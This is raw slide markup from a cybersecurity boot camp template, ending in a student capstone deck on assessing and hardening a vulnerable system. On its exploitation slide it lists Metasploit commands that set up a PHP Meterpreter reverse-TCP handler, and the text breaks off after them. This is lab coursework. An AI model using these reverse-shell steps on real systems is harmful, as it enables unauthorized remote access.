          <p:cNvPr id="509" name="Google Shape;509;p2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0" name="Google Shape;510;p2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1" name="Google Shape;511;p29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2" name="Google Shape;512;p29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13" name="Google Shape;513;p29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14" name="Google Shape;514;p29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15" name="Google Shape;515;p29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6" name="Google Shape;516;p29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7" name="Google Shape;517;p29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18" name="Google Shape;518;p2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p2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" name="Google Shape;520;p2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1" name="Google Shape;521;p2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      <p15:guide id="1" pos="288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. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1"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3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24" name="Google Shape;524;p3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5" name="Google Shape;525;p3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26" name="Google Shape;526;p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27" name="Google Shape;527;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="528" name="Google Shape;528;p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29" name="Google Shape;529;p3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0" name="Google Shape;530;p30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1" name="Google Shape;531;p3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32" name="Google Shape;532;p3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33" name="Google Shape;533;p3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34" name="Google Shape;534;p30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5" name="Google Shape;535;p30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6" name="Google Shape;536;p30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37" name="Google Shape;537;p3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3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p3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p3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      <p15:guide id="1" pos="28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. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1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9" name="Google Shape;29;p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0" name="Google Shape;30;p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 Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="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1" name="Google Shape;31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2" name="Google Shape;32;p4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35" name="Google Shape;35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4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 dirty="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. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1"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3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43" name="Google Shape;543;p3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44" name="Google Shape;544;p3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45" name="Google Shape;545;p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46" name="Google Shape;546;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="547" name="Google Shape;547;p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48" name="Google Shape;548;p3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49" name="Google Shape;549;p31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0" name="Google Shape;550;p3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51" name="Google Shape;551;p3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52" name="Google Shape;552;p3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53" name="Google Shape;553;p31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4" name="Google Shape;554;p31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5" name="Google Shape;555;p31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56" name="Google Shape;556;p31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p31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31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31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      <p15:guide id="1" pos="28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1. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1"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32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62" name="Google Shape;562;p3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3" name="Google Shape;563;p3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64" name="Google Shape;564;p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65" name="Google Shape;565;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="566" name="Google Shape;566;p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67" name="Google Shape;567;p3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8" name="Google Shape;568;p32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9" name="Google Shape;569;p32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70" name="Google Shape;570;p32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71" name="Google Shape;571;p32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72" name="Google Shape;572;p32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3" name="Google Shape;573;p32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4" name="Google Shape;574;p32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5" name="Google Shape;575;p32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76" name="Google Shape;576;p32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77" name="Google Shape;577;p3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p32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Google Shape;579;p3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" name="Google Shape;580;p32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1" name="Google Shape;581;p3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2. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2"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33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84" name="Google Shape;584;p3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5" name="Google Shape;585;p3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86" name="Google Shape;586;p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87" name="Google Shape;587;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p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89" name="Google Shape;589;p3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0" name="Google Shape;590;p33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1" name="Google Shape;591;p33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92" name="Google Shape;592;p33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93" name="Google Shape;593;p33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94" name="Google Shape;594;p33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5" name="Google Shape;595;p33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6" name="Google Shape;596;p33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7" name="Google Shape;597;p33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98" name="Google Shape;598;p33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99" name="Google Shape;599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0" name="Google Shape;600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1" name="Google Shape;601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2" name="Google Shape;602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3. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1"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3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06" name="Google Shape;606;p3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7" name="Google Shape;607;p3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08" name="Google Shape;608;p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09" name="Google Shape;609;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="610" name="Google Shape;610;p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11" name="Google Shape;611;p3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2" name="Google Shape;612;p34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3" name="Google Shape;613;p3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14" name="Google Shape;614;p3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15" name="Google Shape;615;p3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16" name="Google Shape;616;p34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7" name="Google Shape;617;p34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8" name="Google Shape;618;p34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9" name="Google Shape;619;p3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20" name="Google Shape;620;p34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21" name="Google Shape;621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2" name="Google Shape;622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3" name="Google Shape;623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Google Shape;625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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17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4. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1"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3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28" name="Google Shape;628;p3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29" name="Google Shape;629;p3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30" name="Google Shape;630;p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1" name="Google Shape;631;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p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3" name="Google Shape;633;p3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4" name="Google Shape;634;p35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5" name="Google Shape;635;p3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36" name="Google Shape;636;p3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37" name="Google Shape;637;p3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38" name="Google Shape;638;p35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9" name="Google Shape;639;p35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0" name="Google Shape;640;p35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1" name="Google Shape;641;p3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42" name="Google Shape;642;p35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43" name="Google Shape;643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4" name="Google Shape;644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Google Shape;645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      <p15:guide id="1" pos="28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5. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1"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36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50" name="Google Shape;650;p3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1" name="Google Shape;651;p3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52" name="Google Shape;652;p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3" name="Google Shape;653;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="654" name="Google Shape;654;p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5" name="Google Shape;655;p3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6" name="Google Shape;656;p36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7" name="Google Shape;657;p36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58" name="Google Shape;658;p36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59" name="Google Shape;659;p36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60" name="Google Shape;660;p36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61" name="Google Shape;661;p36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62" name="Google Shape;662;p36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3" name="Google Shape;663;p36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4" name="Google Shape;664;p36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5" name="Google Shape;665;p36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6" name="Google Shape;666;p36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67" name="Google Shape;667;p3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36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3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0" name="Google Shape;670;p36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1" name="Google Shape;671;p3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2" name="Google Shape;672;p36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6. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2"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37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75" name="Google Shape;675;p3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6" name="Google Shape;676;p3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77" name="Google Shape;677;p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78" name="Google Shape;678;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p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80" name="Google Shape;680;p3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1" name="Google Shape;681;p37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2" name="Google Shape;682;p37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83" name="Google Shape;683;p37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84" name="Google Shape;684;p37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85" name="Google Shape;685;p37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86" name="Google Shape;686;p37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87" name="Google Shape;687;p37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8" name="Google Shape;688;p37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9" name="Google Shape;689;p37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0" name="Google Shape;690;p37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1" name="Google Shape;691;p37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92" name="Google Shape;692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3" name="Google Shape;693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4" name="Google Shape;694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5" name="Google Shape;695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6" name="Google Shape;696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7" name="Google Shape;697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7. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3"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3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00" name="Google Shape;700;p3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1" name="Google Shape;701;p3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02" name="Google Shape;702;p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03" name="Google Shape;703;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p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05" name="Google Shape;705;p3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6" name="Google Shape;706;p38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7" name="Google Shape;707;p3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08" name="Google Shape;708;p3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09" name="Google Shape;709;p3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10" name="Google Shape;710;p3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11" name="Google Shape;711;p3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12" name="Google Shape;712;p38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3" name="Google Shape;713;p38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4" name="Google Shape;714;p38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5" name="Google Shape;715;p38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6" name="Google Shape;716;p38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17" name="Google Shape;717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      <p15:guide id="1" pos="28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8. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1"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3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25" name="Google Shape;725;p3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6" name="Google Shape;726;p3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27" name="Google Shape;727;p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28" name="Google Shape;728;p3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="729" name="Google Shape;729;p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30" name="Google Shape;730;p3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1" name="Google Shape;731;p39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2" name="Google Shape;732;p3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33" name="Google Shape;733;p3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34" name="Google Shape;734;p3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35" name="Google Shape;735;p3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36" name="Google Shape;736;p3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37" name="Google Shape;737;p39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8" name="Google Shape;738;p39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9" name="Google Shape;739;p39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0" name="Google Shape;740;p39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1" name="Google Shape;741;p39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42" name="Google Shape;742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3" name="Google Shape;743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4" name="Google Shape;744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5" name="Google Shape;745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6" name="Google Shape;746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7" name="Google Shape;747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9. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2"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40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50" name="Google Shape;750;p4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1" name="Google Shape;751;p4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52" name="Google Shape;752;p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53" name="Google Shape;753;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="754" name="Google Shape;754;p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55" name="Google Shape;755;p4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6" name="Google Shape;756;p40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7" name="Google Shape;757;p40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58" name="Google Shape;758;p40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9" name="Google Shape;759;p40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60" name="Google Shape;760;p40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1" name="Google Shape;761;p40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62" name="Google Shape;762;p40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3" name="Google Shape;763;p40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64" name="Google Shape;764;p40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5" name="Google Shape;765;p40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66" name="Google Shape;766;p40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7" name="Google Shape;767;p40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68" name="Google Shape;768;p40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69" name="Google Shape;769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0" name="Google Shape;770;p40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1" name="Google Shape;771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2" name="Google Shape;772;p40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3" name="Google Shape;773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4" name="Google Shape;774;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="139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75" name="Google Shape;775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      <p15:guide id="1" pos="28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. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1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5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9" name="Google Shape;39;p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40" name="Google Shape;40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41" name="Google Shape;41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 dirty="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3" name="Google Shape;43;p5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5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46" name="Google Shape;46;p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 dirty="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0. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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41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78" name="Google Shape;778;p4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79" name="Google Shape;779;p4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80" name="Google Shape;780;p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81" name="Google Shape;781;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="782" name="Google Shape;782;p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83" name="Google Shape;783;p4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4" name="Google Shape;784;p41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5" name="Google Shape;785;p41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86" name="Google Shape;786;p41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7" name="Google Shape;787;p41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88" name="Google Shape;788;p41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9" name="Google Shape;789;p41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90" name="Google Shape;790;p41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1" name="Google Shape;791;p41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92" name="Google Shape;792;p41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3" name="Google Shape;793;p41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94" name="Google Shape;794;p41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5" name="Google Shape;795;p41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96" name="Google Shape;796;p41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97" name="Google Shape;797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8" name="Google Shape;798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9" name="Google Shape;799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0" name="Google Shape;800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1" name="Google Shape;801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2" name="Google Shape;802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03" name="Google Shape;803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      <p15:guide id="1" pos="28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1. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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4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06" name="Google Shape;806;p4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7" name="Google Shape;807;p4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08" name="Google Shape;808;p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09" name="Google Shape;809;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p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11" name="Google Shape;811;p4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2" name="Google Shape;812;p42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3" name="Google Shape;813;p4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14" name="Google Shape;814;p42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5" name="Google Shape;815;p4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16" name="Google Shape;816;p42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7" name="Google Shape;817;p4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18" name="Google Shape;818;p42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9" name="Google Shape;819;p4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20" name="Google Shape;820;p42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1" name="Google Shape;821;p4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22" name="Google Shape;822;p42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3" name="Google Shape;823;p4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24" name="Google Shape;824;p42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25" name="Google Shape;825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6" name="Google Shape;826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7" name="Google Shape;827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8" name="Google Shape;828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9" name="Google Shape;829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0" name="Google Shape;830;p42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31" name="Google Shape;831;p42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      <p15:guide id="1" pos="28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2. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p4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34" name="Google Shape;834;p4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5" name="Google Shape;835;p4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36" name="Google Shape;836;p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37" name="Google Shape;837;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="838" name="Google Shape;838;p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39" name="Google Shape;839;p4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0" name="Google Shape;840;p43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1" name="Google Shape;841;p4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42" name="Google Shape;842;p43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3" name="Google Shape;843;p4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44" name="Google Shape;844;p43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5" name="Google Shape;845;p4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46" name="Google Shape;846;p43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7" name="Google Shape;847;p4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48" name="Google Shape;848;p43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9" name="Google Shape;849;p4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50" name="Google Shape;850;p43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1" name="Google Shape;851;p4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52" name="Google Shape;852;p43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53" name="Google Shape;853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4" name="Google Shape;854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55" name="Google Shape;855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6" name="Google Shape;856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57" name="Google Shape;857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8" name="Google Shape;858;p43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59" name="Google Shape;859;p43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      <p15:guide id="1" pos="28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3. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p4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2" name="Google Shape;862;p4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63" name="Google Shape;863;p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64" name="Google Shape;864;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="865" name="Google Shape;865;p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66" name="Google Shape;866;p4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7" name="Google Shape;867;p44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68" name="Google Shape;868;p44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9" name="Google Shape;869;p44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70" name="Google Shape;870;p44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1" name="Google Shape;871;p44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72" name="Google Shape;872;p44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3" name="Google Shape;873;p44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74" name="Google Shape;874;p44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5" name="Google Shape;875;p44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76" name="Google Shape;876;p44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7" name="Google Shape;877;p44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78" name="Google Shape;878;p44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9" name="Google Shape;879;p44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80" name="Google Shape;880;p44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1" name="Google Shape;881;p44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82" name="Google Shape;882;p44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83" name="Google Shape;883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4" name="Google Shape;884;p44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5" name="Google Shape;885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6" name="Google Shape;886;p44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7" name="Google Shape;887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8" name="Google Shape;888;p44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9" name="Google Shape;889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0" name="Google Shape;890;p44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      <p15:guide id="1" pos="28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4. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="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p4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93" name="Google Shape;893;p4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94" name="Google Shape;894;p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95" name="Google Shape;895;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="896" name="Google Shape;896;p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97" name="Google Shape;897;p4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98" name="Google Shape;898;p45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99" name="Google Shape;899;p45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0" name="Google Shape;900;p45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01" name="Google Shape;901;p45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2" name="Google Shape;902;p45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03" name="Google Shape;903;p45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4" name="Google Shape;904;p45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05" name="Google Shape;905;p45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6" name="Google Shape;906;p45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07" name="Google Shape;907;p45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8" name="Google Shape;908;p45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09" name="Google Shape;909;p45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0" name="Google Shape;910;p45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11" name="Google Shape;911;p45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2" name="Google Shape;912;p45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13" name="Google Shape;913;p45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14" name="Google Shape;914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5" name="Google Shape;915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6" name="Google Shape;916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7" name="Google Shape;917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8" name="Google Shape;918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9" name="Google Shape;919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0" name="Google Shape;920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1" name="Google Shape;921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      <p15:guide id="1" pos="28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5. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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4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24" name="Google Shape;924;p4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25" name="Google Shape;925;p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26" name="Google Shape;926;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="927" name="Google Shape;927;p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28" name="Google Shape;928;p4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29" name="Google Shape;929;p4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30" name="Google Shape;930;p46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1" name="Google Shape;931;p4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32" name="Google Shape;932;p46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3" name="Google Shape;933;p4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34" name="Google Shape;934;p46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5" name="Google Shape;935;p4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36" name="Google Shape;936;p46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7" name="Google Shape;937;p4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38" name="Google Shape;938;p46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9" name="Google Shape;939;p4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40" name="Google Shape;940;p46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1" name="Google Shape;941;p4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42" name="Google Shape;942;p46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3" name="Google Shape;943;p4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44" name="Google Shape;944;p46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45" name="Google Shape;945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6" name="Google Shape;946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7" name="Google Shape;947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8" name="Google Shape;948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9" name="Google Shape;949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0" name="Google Shape;950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1" name="Google Shape;951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2" name="Google Shape;952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      <p15:guide id="1" pos="28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6. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p4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55" name="Google Shape;955;p4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56" name="Google Shape;956;p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57" name="Google Shape;957;p4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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="958" name="Google Shape;958;p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59" name="Google Shape;959;p4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0" name="Google Shape;960;p4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61" name="Google Shape;961;p47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2" name="Google Shape;962;p4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63" name="Google Shape;963;p47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4" name="Google Shape;964;p4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65" name="Google Shape;965;p47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6" name="Google Shape;966;p4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67" name="Google Shape;967;p47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8" name="Google Shape;968;p4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69" name="Google Shape;969;p47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0" name="Google Shape;970;p4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71" name="Google Shape;971;p47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2" name="Google Shape;972;p4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73" name="Google Shape;973;p47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4" name="Google Shape;974;p4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75" name="Google Shape;975;p47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76" name="Google Shape;976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7" name="Google Shape;977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8" name="Google Shape;978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9" name="Google Shape;979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0" name="Google Shape;980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1" name="Google Shape;981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2" name="Google Shape;982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3" name="Google Shape;983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      <p15:guide id="1" pos="28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7. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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5" name="Google Shape;985;p48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86" name="Google Shape;986;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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87" name="Google Shape;987;p4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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988" name="Google Shape;988;p4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89" name="Google Shape;98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990" name="Google Shape;990;p48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991" name="Google Shape;991;p48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8. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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3" name="Google Shape;993;p49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94" name="Google Shape;994;p4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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p49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96" name="Google Shape;996;p49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 dirty="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997" name="Google Shape;99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9. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p5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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1000" name="Google Shape;1000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2900" y="-24125"/>
            <a:ext cx="9229800" cy="5191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 Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2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6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6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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p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0. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="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p5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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1003" name="Google Shape;1003;p5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4" name="Google Shape;1004;p51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 dirty="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05" name="Google Shape;1005;p51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7. The End">
  <p:cSld name="CUSTOM_7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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7" name="Google Shape;1007;p52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08" name="Google Shape;1008;p52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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;101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8599" y="496138"/>
            <a:ext cx="5046801" cy="415122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1. Take a Break 1">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="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5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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p5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2900" y="-24125"/>
            <a:ext cx="9229800" cy="5191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 Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2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7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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p7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. Text Only">
  <p:cSld name="CUSTOM_2_7_2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1" name="Google Shape;61;p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2" name="Google Shape;62;p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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p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4" name="Google Shape;64;p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8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3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. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="119" b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body" idx="2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0" name="Google Shape;70;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p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4" name="Google Shape;74;p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5" name="Google Shape;75;p9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. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1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0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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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9" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="139" r="149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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p1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buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx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</p:sldLayoutIdLst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400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JPG"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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JPG"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.JP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44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JPG"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.JPG"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="31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3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="31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19" name="Google Shape;1019;p5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 smtClean="0"/>
              <a:t>Volodymyr Dudar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Google Shape;1131;p6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Exploitation: [Name of Third Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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33" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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34" name="Google Shape;1134;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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sz="1200" b="1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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? Which tool (Nmap, etc.) or techniques (XSS, etc.) did you use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0"/>
              <a:t>-Msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
